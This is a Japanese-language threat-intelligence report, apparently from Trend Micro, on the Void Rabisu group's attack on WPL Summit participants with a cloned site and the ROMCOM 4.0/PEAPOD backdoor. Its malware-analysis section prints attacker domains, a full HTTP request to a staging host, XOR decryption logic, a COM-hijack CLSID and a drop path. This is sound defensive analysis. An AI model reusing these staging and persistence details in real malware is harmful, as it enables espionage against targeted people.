APT&標的型攻撃
攻撃グループ「Void Rabisu」がROMCOMの新型亜種を用いて女性政治指導者を攻撃
Void Rabisuは脆弱性「CVE-2023-36884」の悪用や偽サイトの作成、バックドア「ROMCOM」の新バージョンの利用などにより、標的型攻撃(APT)グループが用いる攻撃手法で行政機関や軍事組織、WPL(女性政治指導者)サミットのような参加者への攻撃が確認されています。
攻撃グループ「Void Rabisu」は、金銭目的のランサムウェア攻撃と、ウクライナやその支援国に狙いを定めた攻撃キャンペーンの双方で知られています。これまで同グループに狙われた標的として、ウクライナの行政機関、軍事組織、エネルギー・水道事業、欧州連合(EU:European Union)の政治家、一部EU行政機関のスポークスパーソン、セキュリティ会議の参加者などが挙げられます。2023年6月下旬と8月上旬の攻撃では、特にEUの軍事担当者、ジェンダー平等の推進に携わる政治的指導者が狙われました。Void Rabisuは特徴的なツールを多数利用しますが、その代表例がバックドア型マルウェア「ROMCOM」であり、同グループ専用のものと考えられます。ROMCOMは、これまでに幾度にも渡る改修を経て、強力な検知回避機能などが取り込まれてきました。
Void Rabisuは、一般的なサイバー犯罪グループが用いるTTPs(Tactics:戦略、Techniques:テクニック、Procedures:プロシージャ)と、国家支援を受けたサイバー諜報グループなどが用いるTTPsの双方を併用するグループの代表例と言えるでしょう。例えば当該グループは、マルウェアの署名に際して必要な証明書を、サイバー犯罪者向けのサードパーティ・サービスから購入していたと考えられています。この他にも本グループは、システム管理者向けソフトウェアの不正なコピー版をWebサイト上に展開し、そこにユーザを誘導するためにGoogleやBingの宣伝機能を利用して検索エンジンのトラフィックを生成する手口を行使しました。
行政機関や軍事組織を狙った攻撃に関して、Void Rabisuの振る舞いは、APT(Advanced Persistent Threat:標的型攻撃)グループのそれに類似します。例えば2023年の6月、Void Rabisuは当時のゼロデイ脆弱性「CVE-2023-36884」を利用し、世界ウクライナ人会議(Ukrainian World Congress)やNATOサミットを餌に標的をおびき寄せる活動を行いました。この例に留まらず、金銭目当てで活動する攻撃グループの一部(Void Rabisuを含める)が、ウクライナ戦争という緊迫した事態に煽られ、諜報活動に身を乗り出すようになりました。
Microsoft社の報告によると、Void Rabisuは2023年6月下旬に「CVE-2023-36884」に絡むゼロデイ脆弱性を突いて行政機関を攻撃しました。トレンドマイクロのテレメトリ情報からも、本攻撃キャンペーンでヨーロッパの軍事組織、行政担当者、政治家が狙われたことが確認されました。
当該期間中にVoid Rabisuによって拡散されたペイロードは、トレンドマイクロが前回調査したバックドア「ROMCOM」と類似しているものの、同一ではありませんでした。この点より、Void Rabisuは依然としてROMCOMの開発を続けていると考えられます。
2023年8月8日頃、ROMCOMの新規バージョンを用いた攻撃が確認されました。本攻撃では、2023年6月7日から8日にかけてブリュッセルで開催されたWPL(Women Political Leader:女性政治指導者)サミットの公式Webサイトが、Void Rabisuによって不正にコピー、展開されました。最終段階のペイロードはROMCOMの新規バージョンに相当し、トレンドマイクロではこれを「ROMCOM 4.0(PEAPODの名前でも知られる)」として分類しました。
世界各地からの参加者を有するWPLサミットは、政治におけるジェンダー平等の向上を目標としています。2023年6月にブリュッセルで開催されたサミットでは、特に平和と安全、戦争と抑圧、故意の虚偽情報(disinformation)、ウクライナ戦争、政治における女性の役割、ジェンダー平等に関する議論が交わされました。現在または将来の女性リーダーが多く参加するという性質上、この会議は攻撃者にとってサイバー諜報の標的として名高く、政治的組織に足を踏み入れて活動範囲を広げるための格好の踏み台と見なせるでしょう。そのため、2023年にVoid RabisuがWPLサミットの参加者を攻撃したことは、驚くべきことではありません。トレンドマイクロのテレメトリ情報からも、本攻撃キャンペーンでは特にEU圏で政治のジェンダー平等に関わる人々が狙われたことが、明確に示されています。
Void Rabisuによる最近の攻撃キャンペーンでは、過去に報告のなかった新たな手口が利用されました。その一例が、ROMCOMのコマンドコントロール(C&C:Command and Control)サーバによる「TLS強制」であり、これは、自動検知システムなどからROMCOM用インフラを隠蔽する手口に相当します。実際に攻撃者は、正規なソフトウェア「PaperCut」の不正なコピー版を拡散させた2023年5月の攻撃キャンペーンにおいて、この手口を行使しました。具体的には、C&Cサーバ側が通信リクエストのTLS要件をチェックし、所定の条件を満たしていない場合には応答を返さないことが、トレンドマイクロの調査によって判明しました。
本稿では、Void RabisuによるWPLサミットに対する攻撃キャンペーンの発生経緯や内容について解説します。はじめに、本攻撃グループがWPLサミットの参加者をどのように狙ったかについて説明します。
WPLサミット2023の偽装サイト
2023年8月8日、Void RabisuはWPLサミットの正規なWebサイト「wplsummit.org」に扮する偽サイト「wplsummit[.]com」を設置し、アクセス者を誘導しました。図1に示す偽サイトは、正規なサイトと全く同一の外観を有しています。
WPLサミットの正規なWebサイト上で「Videos & photos」をクリックすると、会議の写真を含むGoogle Driveのフォルダにリダイレクトされます。一方、偽サイト上で同じリンクをクリックすると、2つの圧縮ファイルと以下の実行ファイルを含むOneDriveのフォルダにリダイレクトされます。
Unpublished Pictures 1-20230802T122531-002-sfx.exe
このうち、後者の実行ファイルはマルウェアであり、不正な処理を行います。以降、その詳細について解説します。
マルウェア解析
User-Agentに応じて動作を切り替えるマルウェアダウンローダ
OneDriveのフォルダからダウンロードされる実行ファイルには、「Elbor LLC」と呼ばれる企業(過去にも複数の不正なファイルの署名に利用されたことがある)の署名が施され、有効な証明書が添付されています。ユーザが本ファイルを起動すると、自己展開アーカイブのメニューを装った画面が表示されます。ここで「Extract(展開)」のボタンをクリックすると、実行ファイルのリソースセクションから56個の写真が抽出され、所定のフォルダ内に保存されます。
保存される写真は、もともと、LinkedIn、X(旧Twitter)、Instagramをはじめとするソーシャルメディアプラットフォーム上に個々のユーザが投稿していたものであり、今回、攻撃者の手によって採集、利用されました。被害者の関心が写真に向かう一方で、マルウェアはHTTPのGETリクエストを以下のサーバ宛てに送信し、122KBのファイルをダウンロードします。
https://mctelemetryzone[.]com/favicon.ico
なお、宛て先サーバ側ではリクエストヘッダー「User-Agent」の内容をチェックし、下記と一致する場合にのみファイルを返却するように調整されています。
“Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131”
ダウンロードされるファイルはPE実行形式であり、XORで暗号化されています。
この暗号化されたファイルは、下記の疑似コードによって復号されます。
for (i=0; i<len; i++)
data[i] = data[i] ^ 0xf0 * i
復号後のファイルは64ビットのDLLであり、エクスポート関数「CPLInit」が定義されています。本DLLをダウンロードしたマルウェアは、このCPLInitをメモリ上から呼び出して実行します。注目すべき点として、本DLLの内容がディスクに書き込まれることはなく、ダウンロード、復号、読み込み、実行に至る全工程が、メモリ内でのみ行われます。
ペイロードのセットアップ
上述のメモリ上で稼働するDLLは、内部的に「trymenow.dll」の名前で呼ばれます。機能としては、正規のオンラインサービス「worldtimeapi.org」にアクセスし、現在日時を「Unix時間」の形式で取得します。取得した日時は、後にWebリクエストの送り先となるURLのパス部を決定する際に、計算上のシード値として利用します。
当該のパス部は、正規表現で「[12]/[0-9]{9}」の形式を持ちます([12]は「1または2のいずれか」、[0-9]{9}は「0から9までのいずれかを9回繰り返したもの」を指す)。スラッシュ(/)の前に来る部分は、ダウンローダがリクエストするコンポーネントの種類を表します。スラッシュの後に来る部分については、リクエスト間で変化しないため、何らかの識別子であると考えられます。マルウェアはパス部をBase64でエンコードし、これにドメイン部「redditanalytics[.]pm」を付加したURLに対し、第三段階用コンポーネントをダウンロードするためのリクエストを送信します。リクエストの内容例を下記に示します。
GET https://redditanalytics.pm/Mi8xMzI0NTY3ODk=
Accept: /
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 EdgiOS/114.1823.67 Mobile/15E148 Safari/605.1.15
Host: redditanalytics.pm
Connection: Keep-Alive
送信先サーバでは、URLのパス部をBase64でデコードし、異常がない場合にはXORで暗号化済みのファイルを返却します。本ファイルの復号結果は、COMハイジャッキングに利用されるDLLであり、マルウェアはこれを以下にに保存します。
%PUBLIC%\AccountPictures\Defender\Security.dll
今回のVoid Rabisuは、ハイジャック対象として、アプリケーション「WordPad」に使用される以下を選びました。
CLSID {F5078F32-C551-11D3-89B9-0000F81FE221}
この後マルウェアは、再び以下ににアクセスして現在日時を取得し、
worldtimeapi.org
以下のドメインから別のコンポーネントをダウンロードします。
redditanalytics[.]pm
本コンポーネントは、前回解説した「ネットワークコンポーネント」に相当し、以下のC&Cサーバとの通信を行います。
netstaticsinformation[.]com
両ペイロードのダウンロードが完了すると、WordPadが起動し、COMハイジャッキングの仕組みによって第一のペイロードが実行されます。
C&Cサーバとの通信
今回調査したPEAPODの検体は、「WinHTTP」で通信を行う際のプロトコルとして、OSによるデフォルト値ではなく、「TLS 1.2」を直接指定します。正規のソフトウェア「PaperCut」を不正利用した前回の攻撃キャンペーンの場合、C&Cサーバ側がクライアントから来たHTTPリクエストのTLSバージョンをチェックし、条件を満たした場合にのみペイロードを返却するように調整されていました。しかし、今回のWPLサミット2023に対する攻撃で使用されたC&Cサーバは、通信開始時に採択されたTLSのバージョンを問わず、必ずペイロードを返却するように設定されていました。
マルウェアははじめに、以下のAPIを利用する際に必要となるフラグ情報を作成します。
WinHttpSetOption
次に、HTTPセッションを作成し、User-Agentとして「Microsoft Edge 1.0」を指定します。さらに、いかなるデータを送信する前にも、通信プロトコルとして先述の「TLS 1.2」を指定します。
今回、Windowsのバージョン別でSSL/TLSの扱いについて調べました。その結果を下表に示します。
上表を踏まえると、PEAPODはWindows 7またはそれ以前のシステムを侵害できないと考えられます。Void Rabisuが当該フラグを指定した理由については議論のあるところですが、一つの考えとして、セキュリティ対策側によるC&Cサーバの識別を妨害しようとした可能性が挙げられます。
上記の他、PEAPODは証明書関連のエラーを全て無視するフラグを追加設定した上で、以下のAPIを介してPOSTリクエストの送信を開始します。
WinHttpSendRequest
最初に送信するリクエストの内容は空ですが、次のリクエストには、被害システムの情報をC&Cサーバ側に知らせるコマンドが格納されています。
なお、HTTPSプロトコルによるC&Cサーバへの接続に失敗した場合は、生の(raw)TCP(Transmission Control Protocol)によるポート番号442への接続、またはICMP(Internet Control Message Protocol)による接続を試みます。
ROMCOM 3.0とPEAPODを比較
今回、Volexity調査グループからの好意によって提供されたPEAPODの過去バージョンを調査した結果、Void RabisuはROMCOM 3.0の使用を一時停止し、アーキテクチャ面で異なるPEAPODを配布し始めていることが判明しました。両者の差異を、下表に示します。
PEAPODが受け取るコマンドの一覧を下記に示します。
攻撃者は上表に示すコマンドを用いることで、ROMCOM 3.0のワーカーと同じ働きをする追加コンポーネントを送り込み、ROMCOM 3.0を用いた場合と同様に感染端末をコントロールすることが可能です。しかし、今回調査用に設置した感染端末について、追加コンポーネントの受信は確認されていません。
まとめおよび展望
Void Rabisuの活動目的が機会先行型のランサムウェア攻撃から標的を限定したサイバー諜報に切り替わって以来、すでに1年ほど経過していますが、メインのバックドア「ROMCOM」の開発は依然として続いています。最新のROMCOMでは、中核とする機能以外が削ぎ落とされ、必要に応じて追加コンポーネントを動的にダウンロードする方針が採用されています。これにより攻撃者は、それぞれの標的に合わせてコンポーネントを選択し、感染システムに送りつけることが可能です。一方、マルウェア解析チームの視点に立つと、重要な追加コンポーネントを容易に取得できなくなるため、状況分析に支障が出ると考えられます。
Void Rabisuの攻撃キャンペーンでは、政治家、行政機関の職員、軍事組織などの標的を極めて細かく絞り込んでいるケースが見られます。こうした動きは、国家支援を受けているとされるAPTグループに準ずるものであり、Void Rabisuはその領域に踏み込みつつあることが示唆されます。
現状、Void Rabisuが国家支援を受けていることを示す証跡は見つかっていません。しかし、元々サイバー犯罪市場で稼ぎを求めていた人々が、ウクライナ戦争に起因する異常な地政学的状況に煽られ、サイバー諜報活動に引き込まれる可能性は十分にあるでしょう。
Void Rabisuは、2023年に少なくとも3つの会議に目を付け、その参加者を攻撃しました。該当する会議として、「Munich Security Conference」、「Masters of Digital Conference」、そして本稿で述べた「WPLサミット」が挙げられます。将来的に、他の会議や特定のグループが狙われる可能性も十分に考えられます。トレンドマイクロでは、今後もVoid RabisuのTTPsを細かに監視し、新たな攻撃キャンペーンに関する情報を提供していきます。
侵入の痕跡(Indicators of Compromise、IoC)
侵入の痕跡(IoC)について、こちらで確認してください。
本記事は、Lord Remorinからの協力をもとに作成されました。
参考記事:
· Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant
By: Feike Hacquebord, Fernando Merces
翻訳:清水 浩平(Core Technology Marketing, Trend Micro™ Research)